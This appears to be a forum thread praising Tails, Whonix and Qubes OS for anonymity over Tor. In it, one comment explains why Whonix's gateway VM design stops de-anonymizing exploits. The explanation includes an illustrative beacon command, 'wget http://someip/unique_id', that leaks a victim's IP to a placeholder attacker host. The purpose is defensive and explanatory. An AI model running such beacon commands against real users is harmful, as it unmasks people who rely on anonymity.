Tails is great. I am using it for several years now.
Other related projects are whonix ( https://www.whonix.org ), which consists of two virtual machines:
A workstation to work on and a gateway, which torifies all traffic from the workstation VM.
Whonix is also integrated in Qubes OS ( https://www.qubes-os.org ), which allows you to easily work with multiple seperate whonix VMs. There is also the possibility to tunnel all internet traffic of your machine through Tor including system upgrades of the host OS itself.
Whonix/Qubes integration is excellent, and it's certainly a nice perk of Qubes.
To clarify the benefits of the "two VM" approach:
Most of the unmasking exploits against Tor users (as distinguished from unmasking Tor hidden services) involve getting a browser to ignore the proxy settings, somehow. I believe WebRTC, Flash, and various other things have been used to cause the browser to beacon out to some endpoint - you exploit the kitty picture site, and put in code to exploit the browser, which then makes a direct request to http://someip/unique_identifier - and, boom, you've got the user's IP, probable cause, the works.
This happens because a "typical" Tor install is the daemon running locally, but nothing prevents other binaries from making a direct connection out. You set the browser to use socks5://localhost:9050 or something as the proxy, but if you can either get some part of it to misbehave, or just spawn off a different process, it doesn't obey the proxy settings and goes straight out.
Whonix solves this problem by splitting the system into the workstation VM (what you interact with) and the gateway VM (that connects to Tor and "torifies" traffic). The only network port on the workstation VM is connected to the input port on the gateway VM - and everything coming in that port is routed through Tor, via the other (internet connected) port.
So, if you manage to exploit the workstation VM, the attacker still doesn't gain an IP - because they launch a shell that runs 'wget http://someip/unique_id', but that goes out through the gateway VM, and gets encapsulated into Tor before going out, so it still pops out some Tor exit node, not your home IP address.
It raises the bar rather substantially for using Tor, and avoids a lot of the various ways to get Tor to leak. Also, they ship a copy of the Tor Browser in Whonix, which disables a lot of high risk functionality and allows you to very easily disable automatic media parsing and Javascript and such.
Qubes is awesome, and the integrated Whonix stuff is just a beautiful integration.
> The steps below outline how to make all PVH DispVM's permanently fully ephemeral. All data written to the disk will be encrypted with an ephemeral encryption key only stored in RAM. The encryption and encryption key generation is handled by dom0 and is thus inaccessible to the VM.
Other related projects are whonix ( https://www.whonix.org ), which consists of two virtual machines:
A workstation to work on and a gateway, which torifies all traffic from the workstation VM.
Whonix is also integrated in Qubes OS ( https://www.qubes-os.org ), which allows you to easily work with multiple seperate whonix VMs. There is also the possibility to tunnel all internet traffic of your machine through Tor including system upgrades of the host OS itself.